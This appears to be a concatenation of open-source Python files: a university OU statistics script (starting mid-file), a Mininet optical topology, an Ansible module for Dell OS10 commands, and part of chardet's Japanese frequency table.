ou_name = names[0]["name"]
else:
ou_name = u"N/A"
statistics[ou_sko] = {"name": ou_name}
if extra_fak_sum and ou_sko[1] == ou_sko[2] == 0:
statistics[ou_sko]['cum'] = dict()
for key in statistics.keys():
value = {"ansatt": 0,
"a&s": 0,
"student": 0,
"tilknyttet": 0,
"manuell": 0,
"kun manuell": 0,
"alle manuell": 0,
None: 0,
}
statistics[key].update(value)
if 'cum' in statistics[key]:
statistics[key]['cum'].update(value)
logger.debug("Generating stats for %d top-level OUs" % len(statistics))
return statistics
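# A sketch of what make_empty_statistics() produces (hypothetical sko/name,
# for illustration only):
#
#   {(15, 0, 0): {'name': u'Fakultet X',
#                 'cum': {...},            # only when extra_fak_sum is set
#                 'ansatt': 0, 'student': 0, 'a&s': 0, 'tilknyttet': 0,
#                 'manuell': 0, 'kun manuell': 0, 'alle manuell': 0, None: 0},
#    'andre':    {'name': u'undef', 'cum': {...}, ...},
#    ...}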
def make_affiliation_priorities(const):
"""
Prepares and returns a dictionary sorting affiliations/stati according
to this ruleset:
When associating an entity with a faculty during statistics collection,
we have to break ties. The ties are broken in the following fashion:
1. First we compare affiliation; they are classified in this order
ansatt, student, tilknyttet, manuell
2. If an entity has two affiliations of the same type, affiliation
status is used to break up ties in this order:
ansatt -> vitenskaplig, tekadm, bilag, permisjon
student -> aktiv, evu, alumni, perm, opptak, tilbud, soker, privatist
tilknyttet -> emeritus, ekst_forsker, ekst_stip, fagperson, bilag,
gjesteforsker, sivilarbeider, diverse
manuell -> don't care
    For the latter two, we just select one entry. It does not matter which
    one (though this might mean that statistics runs performed one after the
    other fluctuate slightly). Blame baardj for the imprecise specification.
The dictionary uses affiliations as keys. Each value is in turn a
dictionary D, sorting that affiliation's stati. D has at least two
(key,value) pairs -- 'name' and 'value', holding that affiliation's name
and relative sort order.
"""
return {
int(const.affiliation_ansatt): {
"name": "ansatt",
"value": 0,
int(const.affiliation_status_ansatt_vit): 0,
int(const.affiliation_status_ansatt_tekadm): 1,
int(const.affiliation_status_ansatt_bil): 2,
int(const.affiliation_status_ansatt_perm): 3
},
int(const.affiliation_student): {
"name": "student",
"value": 1,
int(const.affiliation_status_student_aktiv): 0,
int(const.affiliation_status_student_evu): 1,
int(const.affiliation_status_student_alumni): 2,
int(const.affiliation_status_student_perm): 3,
int(const.affiliation_status_student_opptak): 4,
int(const.affiliation_status_student_tilbud): 5,
int(const.affiliation_status_student_soker): 6,
int(const.affiliation_status_student_privatist): 7,
},
int(const.affiliation_tilknyttet): {
"name": "tilknyttet",
"value": 2,
int(const.affiliation_tilknyttet_emeritus): 0,
int(const.affiliation_tilknyttet_ekst_forsker): 1,
int(const.affiliation_tilknyttet_ekst_stip): 2,
int(const.affiliation_tilknyttet_fagperson): 3,
int(const.affiliation_tilknyttet_bilag): 4,
int(const.affiliation_tilknyttet_gjesteforsker): 5,
int(const.affiliation_tilknyttet_sivilarbeider): 6,
int(const.affiliation_tilknyttet_diverse): 7,
},
int(const.affiliation_manuell): {
"name": "manuell",
"value": 3,
},
}
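# Sketch of how the priority map above is intended to be used for breaking
# ties ('affiliations' is a hypothetical list of affiliation rows):
#
#   order = make_affiliation_priorities(const)
#   rank = lambda aff: (order[aff["affiliation"]]["value"],
#                       order[aff["affiliation"]].get(aff["status"], 0))
#   best = min(affiliations, key=rank)   # same as sorting and picking [0]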
def generate_people_statistics(perspective, empty_statistics, level, db,
fak_cum=False):
"""
Collect statistics about people.
PERSPECTIVE determines how we view the OU hierarchy (FS, LT, etc)
EMPTY_STATISTICS is a dictionary with default stat values.
LEVEL designates how far up OU hierarchy we walk
The strategy is pretty straightforward:
for each person P
look at P's affiliations A
sort them according to the rules in make_affiliation_priorities
select the first affiliation FA
register P's contribution under the suitable OU derived from FA.ou_id
and affiliation derived from FA.affiliation
done
This will ensure that each person is counted only once, despite having
multiple affiliations to multiple faculties.
NB! A silly thing is that the ruleset is incomplete. Harass baardj for a
more complete specification.
"""
person = Factory.get("Person")(db)
const = Factory.get("Constants")(db)
ou2stedkode = make_ou_to_stedkode_map(db)
ou2parent = make_ou_to_parent_map(perspective, db)
statistics = copy.deepcopy(empty_statistics)
# Cache processed entities
processed = set()
# Sort order for affiliations/stati
order = make_affiliation_priorities(const)
for row in person.list_affiliations(fetchall=False):
id = int(row["person_id"])
if id in processed:
continue
else:
processed.add(id)
affiliations = person.list_affiliations(person_id=id)
# If there are no affiliations, this person contributes nothing to
# the statistics.
if not affiliations:
continue
        # Rank by affiliation first (the 'value' entry), then break ties on
        # the status rank within that affiliation's sub-dictionary.
        affiliations.sort(lambda x, y:
                          cmp(order[x["affiliation"]]["value"],
                              order[y["affiliation"]]["value"])
                          or cmp(order[x["affiliation"]].get(x["status"], 0),
                                 order[y["affiliation"]].get(y["status"], 0)))
aff = affiliations[0]
ou_result = locate_ou(aff["ou_id"], ou2parent, ou2stedkode, level)
if fak_cum:
ou_cum = locate_ou(aff["ou_id"], ou2parent, ou2stedkode, 2)
# a&s (ansatt og student) has a special rule
affs = [x["affiliation"] for x in affiliations]
if (const.affiliation_student in affs and
const.affiliation_ansatt in affs):
affiliation_name = "a&s"
else:
affiliation_name = order[aff["affiliation"]]["name"]
statistics[ou_result][affiliation_name] += 1
if fak_cum:
statistics[ou_cum]['cum'][affiliation_name] += 1
return statistics
def generate_account_statistics(perspective, empty_statistics, level, db,
extra_cum=False):
"""
Collect statistics about accounts.
for each account A
look at A's affiliations F
sort them according to the rules in make_affiliation_priorities
(and by using priority to break ties)
select the first affiliation FA
register A's contribution under a suitable OU derived from FA.ou_id and
affiliation derived from FA.affiliation
done
"""
account = Factory.get("Account")(db)
const = Factory.get("Constants")(db)
ou2stedkode = make_ou_to_stedkode_map(db)
ou2parent = make_ou_to_parent_map(perspective, db)
statistics = copy.deepcopy(empty_statistics)
# sort order for affiliations
order = make_affiliation_priorities(const)
# Keep track of accounts that had been processed
processed = set()
for row in account.list_accounts_by_type(fetchall=False):
if int(row["account_id"]) in processed:
continue
else:
processed.add(int(row["account_id"]))
affiliations = account.list_accounts_by_type(
account_id=row["account_id"],
filter_expired=True,
fetchall=True)
# Affiliations have already been ordered according to priority. Just
# pick the first one.
if not affiliations:
continue
manual_only = all((x['affiliation'] == const.affiliation_manuell
for x in affiliations))
manual = [x for x in affiliations
if x['affiliation'] == const.affiliation_manuell]
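        # manual_only: every affiliation on the account is MANUELL; such
        # accounts are counted under 'kun manuell' for the OU of their first
        # (highest priority) affiliation below.
        # manual: all MANUELL affiliations of the account; each is counted
        # under 'alle manuell' for its own OU further down.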
if manual and not manual_only:
for a in affiliations:
if a['affiliation'] != const.affiliation_manuell:
aff = a
break
else:
aff = affiliations[0]
ou_result = locate_ou(aff["ou_id"], ou2parent, ou2stedkode, level)
if extra_cum:
ou_cum = locate_ou(aff["ou_id"], ou2parent, ou2stedkode, 2)
affs = [x["affiliation"] for x in affiliations]
if (const.affiliation_student in affs and
const.affiliation_ansatt in affs):
affiliation_name = "a&s"
else:
affiliation_name = order[aff["affiliation"]]["name"]
try:
statistics[ou_result][affiliation_name] += 1
if extra_cum:
statistics[ou_cum]['cum'][affiliation_name] += 1
if manual_only:
statistics[ou_result]['kun manuell'] += 1
if extra_cum:
statistics[ou_cum]['cum']['kun manuell'] += 1
except:
logger.error("ou_result = %s (%s; %s);",
ou_result, ou_result in statistics,
text_type(aff.ou_id))
raise
for aff in manual:
ou_result = locate_ou(aff['ou_id'], ou2parent, ou2stedkode, level)
try:
statistics[ou_result]['alle manuell'] += 1
if extra_cum:
statistics[locate_ou(aff['ou_id'],
ou2parent,
ou2stedkode,
2)]['cum']['alle manuell'] += 1
except:
logger.error('ou_result = %s (%s; %s); (for manual)',
ou_result, ou_result in statistics,
text_type(aff.ou_id))
return statistics
def main():
global logger
logger = Factory.get_logger("cronjob")
logger.info("Statistics for OUs at UiO")
ap = argparse.ArgumentParser()
ap.add_argument('-p', '--people', action='store_true',
help='Get people statistics')
ap.add_argument('-u', '--users', action='store_true',
help='Get user statistics')
ap.add_argument('-l', '--level', action='store',
choices=('fakultet', 'institutt', 'gruppe'),
required=True,
help='The granularity of the report')
ap.add_argument('-c', '--cumulate', action='store_true',
help='Add cumulated results to faculty')
ap.add_argument('-e', '--perspective', action='store',
choices=('FS', 'SAP', 'LT'),
required=True,
help='OU perspective to use')
ap.add_argument('-k', '--keep', action='store_true',
help='Keep all zero rows')
args = ap.parse_args()
db = Factory.get("Database")()
const = Factory.get("Constants")(db)
level = {"fakultet": 2, "institutt": 1, "gruppe": 0}[args.level]
perspective = {
"FS": const.perspective_fs,
"SAP": const.perspective_sap,
"LT": const.perspective_lt
}[args.perspective]
cum = args.cumulate
if args.people:
people_result = generate_people_statistics(
perspective,
make_empty_statistics(level, db, cum), level, db, cum)
if not args.keep:
purge_0rows(people_result)
display_statistics(people_result)
if args.users:
users_result = generate_account_statistics(
perspective,
make_empty_statistics(level, db, cum), level, db, cum)
if not args.keep:
purge_0rows(users_result)
display_statistics(users_result)
if __name__ == '__main__':
main()
| gpl-2.0 |
packet-tracker/onos-1.2.0-custom-build | tools/test/topos/optical2.py | 19 | 2477 | #!/usr/bin/env python
''' file: custom/optical.py '''
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel, info
from mininet.link import Intf, Link
from mininet.node import RemoteController
class NullIntf( Intf ):
"A dummy interface with a blank name that doesn't do any configuration"
def __init__( self, name, **params ):
self.name = ''
class NullLink( Link ):
"A dummy link that doesn't touch either interface"
def makeIntfPair( cls, intf1, intf2, *args, **kwargs ):
pass
def delete( self ):
pass
class OpticalTopo(Topo):
def addIntf( self, switch, intfName ):
"Add intf intfName to switch"
self.addLink( switch, switch, cls=NullLink,
intfName1=intfName, cls2=NullIntf )
def __init__(self):
# Initialize topology
Topo.__init__(self)
# Add hosts and switches
h1 = self.addHost('h1')
h2 = self.addHost('h2')
h3 = self.addHost('h3')
h4 = self.addHost('h4')
h5 = self.addHost('h5')
h6 = self.addHost('h6')
s1 = self.addSwitch('s1', dpid="0000ffffffff0001")
s2 = self.addSwitch('s2', dpid="0000ffffffff0002")
s3 = self.addSwitch('s3', dpid="0000ffffffff0003")
s4 = self.addSwitch('s4', dpid="0000ffffffff0004")
s5 = self.addSwitch('s5', dpid="0000ffffffff0005")
s6 = self.addSwitch('s6', dpid="0000ffffffff0006")
# Add links from hosts to OVS
self.addLink(s1, h1)
self.addLink(s2, h2)
self.addLink(s3, h3)
self.addLink(s4, h4)
self.addLink(s5, h5)
self.addLink(s6, h6)
# add links from ovs to linc-oe
# sorry about the syntax :(
self.addIntf(s1,'tap29')
self.addIntf(s2,'tap30')
self.addIntf(s3,'tap31')
self.addIntf(s4,'tap32')
self.addIntf(s5,'tap33')
self.addIntf(s6,'tap34')
# If you run this via `sudo mn --custom custom/optical.py`, register the topo:
topos = {'optical': ( lambda: OpticalTopo() )}
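# For example (assuming a controller listening on 127.0.0.1:6653), something
# like:
#   sudo mn --custom custom/optical.py --topo optical \
#       --controller=remote,ip=127.0.0.1,port=6653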
def run():
c = RemoteController('c','127.0.0.1',6653)
net = Mininet( topo=OpticalTopo(),controller=None,autoSetMacs=True)
net.addController(c)
net.start()
#installStaticFlows( net )
CLI( net )
net.stop()
# if the script is run directly (sudo custom/optical.py):
if __name__ == '__main__':
setLogLevel('info')
run()
| apache-2.0 |
dav1x/ansible | lib/ansible/modules/network/dellos10/dellos10_command.py | 46 | 7522 | #!/usr/bin/python
#
# (c) 2015 Peter Sprygada, <[email protected]>
#
# Copyright (c) 2017 Dell Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: dellos10_command
version_added: "2.2"
author: "Senthil Kumar Ganesan (@skg-net)"
short_description: Run commands on remote devices running Dell OS10
description:
- Sends arbitrary commands to a Dell OS10 node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(dellos10_config) to configure Dell OS10 devices.
extends_documentation_fragment: dellos10
options:
commands:
description:
- List of commands to send to the remote dellos10 device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
        module does not return until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of I(retries), the task fails.
See examples.
required: false
default: null
retries:
description:
      - Specifies the number of retries a command should be tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
required: false
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
required: false
default: 1
"""
EXAMPLES = """
# Note: examples below use the following provider dict to handle
# transport and authentication to the node.
vars:
cli:
host: "{{ inventory_hostname }}"
username: admin
password: admin
transport: cli
tasks:
- name: run show version on remote devices
dellos10_command:
commands: show version
provider: "{{ cli }}"
- name: run show version and check to see if output contains OS10
dellos10_command:
commands: show version
wait_for: result[0] contains OS10
provider: "{{ cli }}"
- name: run multiple commands on remote nodes
dellos10_command:
commands:
- show version
- show interface
provider: "{{ cli }}"
- name: run multiple commands and evaluate the output
dellos10_command:
commands:
- show version
- show interface
wait_for:
- result[0] contains OS10
- result[1] contains Ethernet
provider: "{{ cli }}"
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always apart from low level errors (such as action plugin)
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always apart from low level errors (such as action plugin)
type: list
sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
warnings:
description: The list of warnings (if any) generated by module based on arguments
returned: always
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.dellos10 import run_commands
from ansible.module_utils.dellos10 import dellos10_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network_common import ComplexList
from ansible.module_utils.netcli import Conditional
def to_lines(stdout):
for item in stdout:
if isinstance(item, basestring):
item = str(item).split('\n')
yield item
def parse_commands(module, warnings):
command = ComplexList(dict(
command=dict(key=True),
prompt=dict(),
answer=dict()
), module)
commands = command(module.params['commands'])
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
warnings.append(
'only show commands are supported when using check mode, not '
'executing `%s`' % item['command']
)
elif item['command'].startswith('conf'):
module.fail_json(
msg='dellos10_command does not support running config mode '
'commands. Please use dellos10_config instead'
)
return commands
def main():
"""main entry point for module execution
"""
argument_spec = dict(
# { command: <str>, prompt: <str>, response: <str> }
commands=dict(type='list', required=True),
wait_for=dict(type='list', aliases=['waitfor']),
match=dict(default='all', choices=['all', 'any']),
retries=dict(default=10, type='int'),
interval=dict(default=1, type='int')
)
argument_spec.update(dellos10_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
check_args(module, warnings)
commands = parse_commands(module, warnings)
result['warnings'] = warnings
wait_for = module.params['wait_for'] or list()
conditionals = [Conditional(c) for c in wait_for]
retries = module.params['retries']
interval = module.params['interval']
match = module.params['match']
while retries > 0:
responses = run_commands(module, commands)
for item in list(conditionals):
if item(responses):
if match == 'any':
conditionals = list()
break
conditionals.remove(item)
if not conditionals:
break
time.sleep(interval)
retries -= 1
if conditionals:
failed_conditions = [item.raw for item in conditionals]
        msg = 'One or more conditional statements have not been satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions)
result = {
'changed': False,
'stdout': responses,
'stdout_lines': list(to_lines(responses))
}
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
Architektor/PySnip | venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/jisfreq.py | 3131 | 47315 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Sampling from about 20M text materials include literature and computer technology
#
# Japanese frequency table, applied to both S-JIS and EUC-JP
# They are sorted in order.
# 128 --> 0.77094
# 256 --> 0.85710
# 512 --> 0.92635
# 1024 --> 0.97130
# 2048 --> 0.99431
#
# Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58
# Random Distribution Ratio = 512 / (2965+62+83+86-512) = 0.191
#
# Typical Distribution Ratio, 25% of IDR
JIS_TYPICAL_DISTRIBUTION_RATIO = 3.0
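# (Presumably 25% of 12.58 ~= 3.15, rounded to 3.0 above.)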
# Char to FreqOrder table ,
JIS_TABLE_SIZE = 4368
JISCharToFreqOrder = (
40, 1, 6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, # 16
3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247, 18, 179,5071, 856,1661, # 32
1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, # 48
2042,1061,1062, 48, 49, 44, 45, 433, 434,1040,1041, 996, 787,2997,1255,4305, # 64
2108,4609,1684,1648,5073,5074,5075,5076,5077,5078,3687,5079,4610,5080,3927,3928, # 80
5081,3296,3432, 290,2285,1471,2187,5082,2580,2825,1303,2140,1739,1445,2691,3375, # 96
1691,3297,4306,4307,4611, 452,3376,1182,2713,3688,3069,4308,5083,5084,5085,5086, # 112
5087,5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102, # 128
5103,5104,5105,5106,5107,5108,5109,5110,5111,5112,4097,5113,5114,5115,5116,5117, # 144
5118,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,5130,5131,5132,5133, # 160
5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,5149, # 176
5150,5151,5152,4612,5153,5154,5155,5156,5157,5158,5159,5160,5161,5162,5163,5164, # 192
5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,1472, 598, 618, 820,1205, # 208
1309,1412,1858,1307,1692,5176,5177,5178,5179,5180,5181,5182,1142,1452,1234,1172, # 224
1875,2043,2149,1793,1382,2973, 925,2404,1067,1241, 960,1377,2935,1491, 919,1217, # 240
1865,2030,1406,1499,2749,4098,5183,5184,5185,5186,5187,5188,2561,4099,3117,1804, # 256
2049,3689,4309,3513,1663,5189,3166,3118,3298,1587,1561,3433,5190,3119,1625,2998, # 272
3299,4613,1766,3690,2786,4614,5191,5192,5193,5194,2161, 26,3377, 2,3929, 20, # 288
3691, 47,4100, 50, 17, 16, 35, 268, 27, 243, 42, 155, 24, 154, 29, 184, # 304
4, 91, 14, 92, 53, 396, 33, 289, 9, 37, 64, 620, 21, 39, 321, 5, # 320
12, 11, 52, 13, 3, 208, 138, 0, 7, 60, 526, 141, 151,1069, 181, 275, # 336
1591, 83, 132,1475, 126, 331, 829, 15, 69, 160, 59, 22, 157, 55,1079, 312, # 352
109, 38, 23, 25, 10, 19, 79,5195, 61, 382,1124, 8, 30,5196,5197,5198, # 368
5199,5200,5201,5202,5203,5204,5205,5206, 89, 62, 74, 34,2416, 112, 139, 196, # 384
271, 149, 84, 607, 131, 765, 46, 88, 153, 683, 76, 874, 101, 258, 57, 80, # 400
32, 364, 121,1508, 169,1547, 68, 235, 145,2999, 41, 360,3027, 70, 63, 31, # 416
43, 259, 262,1383, 99, 533, 194, 66, 93, 846, 217, 192, 56, 106, 58, 565, # 432
280, 272, 311, 256, 146, 82, 308, 71, 100, 128, 214, 655, 110, 261, 104,1140, # 448
54, 51, 36, 87, 67,3070, 185,2618,2936,2020, 28,1066,2390,2059,5207,5208, # 464
5209,5210,5211,5212,5213,5214,5215,5216,4615,5217,5218,5219,5220,5221,5222,5223, # 480
5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,5235,5236,3514,5237,5238, # 496
5239,5240,5241,5242,5243,5244,2297,2031,4616,4310,3692,5245,3071,5246,3598,5247, # 512
4617,3231,3515,5248,4101,4311,4618,3808,4312,4102,5249,4103,4104,3599,5250,5251, # 528
5252,5253,5254,5255,5256,5257,5258,5259,5260,5261,5262,5263,5264,5265,5266,5267, # 544
5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,5279,5280,5281,5282,5283, # 560
5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,5294,5295,5296,5297,5298,5299, # 576
5300,5301,5302,5303,5304,5305,5306,5307,5308,5309,5310,5311,5312,5313,5314,5315, # 592
5316,5317,5318,5319,5320,5321,5322,5323,5324,5325,5326,5327,5328,5329,5330,5331, # 608
5332,5333,5334,5335,5336,5337,5338,5339,5340,5341,5342,5343,5344,5345,5346,5347, # 624
5348,5349,5350,5351,5352,5353,5354,5355,5356,5357,5358,5359,5360,5361,5362,5363, # 640
5364,5365,5366,5367,5368,5369,5370,5371,5372,5373,5374,5375,5376,5377,5378,5379, # 656
5380,5381, 363, 642,2787,2878,2788,2789,2316,3232,2317,3434,2011, 165,1942,3930, # 672
3931,3932,3933,5382,4619,5383,4620,5384,5385,5386,5387,5388,5389,5390,5391,5392, # 688
5393,5394,5395,5396,5397,5398,5399,5400,5401,5402,5403,5404,5405,5406,5407,5408, # 704
5409,5410,5411,5412,5413,5414,5415,5416,5417,5418,5419,5420,5421,5422,5423,5424, # 720
5425,5426,5427,5428,5429,5430,5431,5432,5433,5434,5435,5436,5437,5438,5439,5440, # 736
5441,5442,5443,5444,5445,5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456, # 752
5457,5458,5459,5460,5461,5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472, # 768
5473,5474,5475,5476,5477,5478,5479,5480,5481,5482,5483,5484,5485,5486,5487,5488, # 784
5489,5490,5491,5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504, # 800
5505,5506,5507,5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520, # 816
5521,5522,5523,5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536, # 832
5537,5538,5539,5540,5541,5542,5543,5544,5545,5546,5547,5548,5549,5550,5551,5552, # 848
5553,5554,5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568, # 864
5569,5570,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584, # 880
5585,5586,5587,5588,5589,5590,5591,5592,5593,5594,5595,5596,5597,5598,5599,5600, # 896
5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,5615,5616, # 912
5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,5632, # 928
5633,5634,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,5647,5648, # 944
5649,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,5661,5662,5663,5664, # 960
5665,5666,5667,5668,5669,5670,5671,5672,5673,5674,5675,5676,5677,5678,5679,5680, # 976
5681,5682,5683,5684,5685,5686,5687,5688,5689,5690,5691,5692,5693,5694,5695,5696, # 992
5697,5698,5699,5700,5701,5702,5703,5704,5705,5706,5707,5708,5709,5710,5711,5712, # 1008
5713,5714,5715,5716,5717,5718,5719,5720,5721,5722,5723,5724,5725,5726,5727,5728, # 1024
5729,5730,5731,5732,5733,5734,5735,5736,5737,5738,5739,5740,5741,5742,5743,5744, # 1040
5745,5746,5747,5748,5749,5750,5751,5752,5753,5754,5755,5756,5757,5758,5759,5760, # 1056
5761,5762,5763,5764,5765,5766,5767,5768,5769,5770,5771,5772,5773,5774,5775,5776, # 1072
5777,5778,5779,5780,5781,5782,5783,5784,5785,5786,5787,5788,5789,5790,5791,5792, # 1088
5793,5794,5795,5796,5797,5798,5799,5800,5801,5802,5803,5804,5805,5806,5807,5808, # 1104
5809,5810,5811,5812,5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824, # 1120
5825,5826,5827,5828,5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840, # 1136
5841,5842,5843,5844,5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856, # 1152
5857,5858,5859,5860,5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872, # 1168
5873,5874,5875,5876,5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888, # 1184
5889,5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904, # 1200
5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920, # 1216
5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936, # 1232
5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952, # 1248
5953,5954,5955,5956,5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968, # 1264
5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984, # 1280
5985,5986,5987,5988,5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000, # 1296
6001,6002,6003,6004,6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016, # 1312
6017,6018,6019,6020,6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032, # 1328
6033,6034,6035,6036,6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048, # 1344
6049,6050,6051,6052,6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064, # 1360
6065,6066,6067,6068,6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080, # 1376
6081,6082,6083,6084,6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096, # 1392
6097,6098,6099,6100,6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112, # 1408
6113,6114,2044,2060,4621, 997,1235, 473,1186,4622, 920,3378,6115,6116, 379,1108, # 1424
4313,2657,2735,3934,6117,3809, 636,3233, 573,1026,3693,3435,2974,3300,2298,4105, # 1440
854,2937,2463, 393,2581,2417, 539, 752,1280,2750,2480, 140,1161, 440, 708,1569, # 1456
665,2497,1746,1291,1523,3000, 164,1603, 847,1331, 537,1997, 486, 508,1693,2418, # 1472
1970,2227, 878,1220, 299,1030, 969, 652,2751, 624,1137,3301,2619, 65,3302,2045, # 1488
1761,1859,3120,1930,3694,3516, 663,1767, 852, 835,3695, 269, 767,2826,2339,1305, # 1504
896,1150, 770,1616,6118, 506,1502,2075,1012,2519, 775,2520,2975,2340,2938,4314, # 1520
3028,2086,1224,1943,2286,6119,3072,4315,2240,1273,1987,3935,1557, 175, 597, 985, # 1536
3517,2419,2521,1416,3029, 585, 938,1931,1007,1052,1932,1685,6120,3379,4316,4623, # 1552
804, 599,3121,1333,2128,2539,1159,1554,2032,3810, 687,2033,2904, 952, 675,1467, # 1568
3436,6121,2241,1096,1786,2440,1543,1924, 980,1813,2228, 781,2692,1879, 728,1918, # 1584
3696,4624, 548,1950,4625,1809,1088,1356,3303,2522,1944, 502, 972, 373, 513,2827, # 1600
586,2377,2391,1003,1976,1631,6122,2464,1084, 648,1776,4626,2141, 324, 962,2012, # 1616
2177,2076,1384, 742,2178,1448,1173,1810, 222, 102, 301, 445, 125,2420, 662,2498, # 1632
277, 200,1476,1165,1068, 224,2562,1378,1446, 450,1880, 659, 791, 582,4627,2939, # 1648
3936,1516,1274, 555,2099,3697,1020,1389,1526,3380,1762,1723,1787,2229, 412,2114, # 1664
1900,2392,3518, 512,2597, 427,1925,2341,3122,1653,1686,2465,2499, 697, 330, 273, # 1680
380,2162, 951, 832, 780, 991,1301,3073, 965,2270,3519, 668,2523,2636,1286, 535, # 1696
1407, 518, 671, 957,2658,2378, 267, 611,2197,3030,6123, 248,2299, 967,1799,2356, # 1712
850,1418,3437,1876,1256,1480,2828,1718,6124,6125,1755,1664,2405,6126,4628,2879, # 1728
2829, 499,2179, 676,4629, 557,2329,2214,2090, 325,3234, 464, 811,3001, 992,2342, # 1744
2481,1232,1469, 303,2242, 466,1070,2163, 603,1777,2091,4630,2752,4631,2714, 322, # 1760
2659,1964,1768, 481,2188,1463,2330,2857,3600,2092,3031,2421,4632,2318,2070,1849, # 1776
2598,4633,1302,2254,1668,1701,2422,3811,2905,3032,3123,2046,4106,1763,1694,4634, # 1792
1604, 943,1724,1454, 917, 868,2215,1169,2940, 552,1145,1800,1228,1823,1955, 316, # 1808
1080,2510, 361,1807,2830,4107,2660,3381,1346,1423,1134,4108,6127, 541,1263,1229, # 1824
1148,2540, 545, 465,1833,2880,3438,1901,3074,2482, 816,3937, 713,1788,2500, 122, # 1840
